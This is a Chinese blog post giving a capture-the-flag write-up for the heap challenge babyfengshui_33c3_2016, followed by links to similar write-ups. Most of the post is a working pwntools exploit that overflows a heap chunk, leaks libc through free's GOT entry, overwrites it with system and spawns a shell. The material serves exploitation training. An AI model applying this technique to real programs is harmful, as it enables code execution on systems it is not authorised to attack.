babyfengshui_33c3_2016 -- house of spirit

最新推荐文章于 2024-01-24 03:30:33 发布
最新推荐文章于 2024-01-24 03:30:33 发布
阅读量117 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/114945415
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏

本题主要就是看懂一条判断溢出的if语句

在这里插入图片描述

结构体是怎么看出来的

  • 代码上看

    在这里插入图片描述

    struct{
    char *text;
    char name[124];
}

  • 从内存上看

    在这里插入图片描述

思路

在这里插入图片描述

step4 的关于408哪里来的

  • 看内存地址,计算chunk3的content到chunk1的struct即可

在这里插入图片描述

在这里插入图片描述

exp

from pwn import *
p = remote('node3.buuoj.cn',29853)
#p = process('./babyfengshui_33c3_2016')
context.log_level = 'debug'
elf = ELF('./babyfengshui_33c3_2016')
def add(size,name,length,text):
	p.sendlineafter('Action: ',str(0))
	p.sendlineafter('size of description: ',str(size))
	p.sendlineafter('name: ',name)
	p.sendlineafter('text length: ',str(length))
	p.sendlineafter('text: ',text)

def free(index):
	p.sendlineafter('Action: ',str(1))
	p.sendlineafter('index: ',str(index))
def update(index,length,text):
	p.sendlineafter('Action: ',str(3))
	p.sendlineafter('index: ',str(index))
	p.sendlineafter('text length: ',str(length))
	p.sendlineafter('text: ',text)
def show(index):
        p.sendlineafter('Action: ',str(2))
        p.sendlineafter('index: ',str(index))
#step1 创建三个chunk
add(0x80,'huzai',0x78,'aaa')
add(0x80,'huzai',0x78,'ccc')
add(0x80,'huzai',0x78,'/bin/sh\x00')
#step2 free chunk0
free(0)
#step3 新申请一个大的chunk
add(0x100,'hzuai222',0x98,'dddd')
#step4 修改chunk3 的内容,溢出到chunk1 的struct,修改node1的content指针位free_got
update(3,0x200,b'a'*408+p32(elf.got['free']))
#step5 show chunk1泄露free的got地址,计算出libc_base
show(1)
from LibcSearcher import *
p.recvuntil("description: ")
free_addr=u32(p.recv(4))
libc=LibcSearcher("free",free_addr)
libc_base=free_addr-libc.dump("free")
system_addr=libc_base+libc.dump("system")
#step6 修改free_got 为 system,编辑chunk2的content为/bin/sh\x00
update(1,0x4,p32(system_addr))
#step7 释放chunk2
free(2)
p.interactive()
huzai9527
关注
专栏目录
BUUCTF pwn babyfengshui_33c3_2016(简单堆)
菜的只能随便写写博客
02-17 2049
0x01 文件分析   0x02 运行  程序提供了几个简单的功能,增删改查都有。运行的时候程序有定时机制,可以用IDA的patch功能修改二进制指令,消除定时。   0x03 静态分析 主函数: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] ...
【CTF】【PWN】胎教向babyfengshui_33c3_2016题解
m0_50819561的博客
10-12 301
跳过checksec,我们直接分析程序。 我这里把这些函数命名为add,delete,display,edit。 先看add。 就是创建两个chunk,一个的地址存放在s里,一个的地址存放在v2里。 然后把s存在v2指向的地址里,用一个名为ptr的数组存放v2。 可以看出来,我们创建了两个chunk。按顺序命名为chunk1和chunk2.我们把这两个chunk看作是一个user的两部分。显然,chunk1存放了user的内容,chunk2存放了user的内容的地址和user的名字。 其中name
babyfengshui_33c3_2016
m0sway的博客
12-28 1443
babyfengshui_33c3_2016 使用checksec查看: 开启了Canary和栈不可执行,看题目像是一道heap题目。 放进IDA中查看: void __cdecl __noreturn main() { char v0; // [esp+3h] [ebp-15h] int v1; // [esp+4h] [ebp-14h] size_t v2; // [esp+8h] [ebp-10h] unsigned int v3; // [esp+Ch] [ebp-Ch] v
buuctf-babyfengshui_33c3_2016
weixin_48807177的博客
05-04 664
ubuntu16 Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) //没开 基本就这里有点问题 if ( (char *)(v3 + *(_DWORD *)ptr[a1]) >= (char *)ptr[a1] - 4 ) 而重点则是在ed...
[BUUCTF]PWN——babyfengshui_33c3_2016
mcmuyanga的博客
01-02 608
babyfengshui_33c3_2016 附件 步骤: 例行检查,32位程序,开启了cannary和nx 本地运行一下看看大概的情况,熟悉的堆的菜单布局 32位ida载入,看main函数 add update delete display 上面看到了update在判断长度的时候存在问题,它的长度判断根据是:以chunk0来说,以chunk0的地址加上chunk0的长度是否等于chunk0name的地址来判断的,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的
robomongo-0.9.0-rc10-windows-x86_64
10-31
根据压缩包子文件的文件名称"robomongo-0.9.0-rc10-windows-x86_64-33c89ea.exe",我们可以推断这个文件是RoboMongo的安装程序,后缀".exe"表明它是Windows平台下的可执行文件,而"33c89ea"可能是这个特定构建的唯一...
python绘制路飞_python/路飞项目/1-项目基础/2-虚拟环境的搭建
weixin_36358217的博客
12-23 384
引言众所周知,运行Python创建的项目时,需要用到Python解释器,但是有时候不同的项目之间,需要用到的模块和包的版本不同,不同的配置会起冲突,这时候就需要用到虚拟环境了。安装了虚拟环境之后:不同的项目将可以使用不同的虚拟环境。 要解决先前需求相冲突的例子,应用程序 A 可以拥有自己的 安装了 1.0 版本的虚拟环境,而应用程序 B 则拥有安装了 2.0 版本的另一个虚拟环境。 如果应用程序 ...
Python-c6sh是在33C3用于兑换预订票和卖票的cashdesk系统
08-12
c6sh是在33C3用于兑换预订票和卖票的cashdesk系统
buuctf babyfengshui_33c3_2016
weixin_45677731的博客
08-19 422
这是四个主要的函数: add函数: add函数的输入部分: 同时,这也是update函数,其实这个函数是有溢出的漏洞的,它对于长度的检查是有问题的,后面就会利用到这一点 delete函数: display函数: 先随意创建几个chunk,看看布局, add(0x80,"nam1",0x80,"aaaa") add(0x80,"nam2",0x80,"bbbb") add(0x80,"nam3",0x80,"cccc") 以第一个为例,储存text的chunk在前,后面是储存name的chunk,
babyfengshui_33c3_2016[堆溢出]
、moddemod
06-26 360
未来的你 = 你的热情 + 你的努力 + 那么微不足道的天赋 其实做pwn题我感觉都是只可意会,但并非不可言传,只是说了感觉和说废话一样,没有什么实质性的作用,最最重要的是要自己多去操作调试,pwn多了也就那样吧!但是最核心的永远是你coding的能力!虽然在干着逆向的事,但是coding的能力决定了你的高度! ----小白感悟 这道题问题出现在更新的时候边界的判断方法有问题,结合的堆的机制,就可以形成堆溢出! 添加一个用户会申请两个chunk,后一个chunk的内容为.
【buu】babyfengshui_33c3_2016(详细题解)
qq_62068476的博客
03-15 442
buu日常一题
babyfengshui_33c3_2016的wp
wuyvle的博客
03-05 155
这是个相当好的堆题 add函数 可以看出这是个结构体 struct Node{ char * description; char name[0x7C]; } s便是description的空间地址,而v2则是结构体的空间。 delete函数 display update 这里限制了输入的长度 对于chunk0来说,就是0x80c008+输入长度是否大于0x804c08c,但是,有一个问题就是,chunk0和chunk0(name)其实不一定是相邻的,这样的话就有了实现溢出的可能 add(0x8
[BUUCTF]-PWN:babyfengshui_33c3_2016解析
最新发布
2301_79326813的博客
01-24 672
又是一道堆题,先看保护关键信息是32位,没开pie直接看ida大致是alloc创建堆块,free释放堆块,show查看堆块内容,fill填充堆块内容其他的都没啥关键的要讲,但alloc那里非常需要解析一下解释如上图再具体一点就是 我们输入的字节大小+堆块地址>=相邻0x80堆块的地址时会被强制退出必须要 我们输入的字节大小+堆块地址
babyfengshui_33c3_2016题解
coco的博客
12-09 912
这道题还是比较基础的堆题,泄漏libc和get shell都比较基础。需要注意的是以下几点: 输入长度限制的绕过方法值得学习一下。 泄漏libc时将free got表中写入puts.plt是不可行的,因为这道题的输入结束时候会带上\x00,这样就会破坏free got表的下一项fgets got,导致程序运行失败。 我最后本机上运行成功,但是远程打不通,后来经过发现是因为libc的版本不一样,导...
(攻防世界)(pwn)babyfengshui
PLpa的博客
08-03 1305
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
babyfengshui__BUUCTF
Jc
09-29 594
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2375
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
三菱电梯LEHY-III故障代码详解与维修指南
8. 32C-33C的故障代码涉及散热器温度过高、温度检测回路断线以及整流侧各相的综合故障,提示可能存在冷却系统故障或者整流模块的问题。 9. 336(SF_PLLHE1板锁相环故障)是关于电梯控制系统中锁相环的错误,这直接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值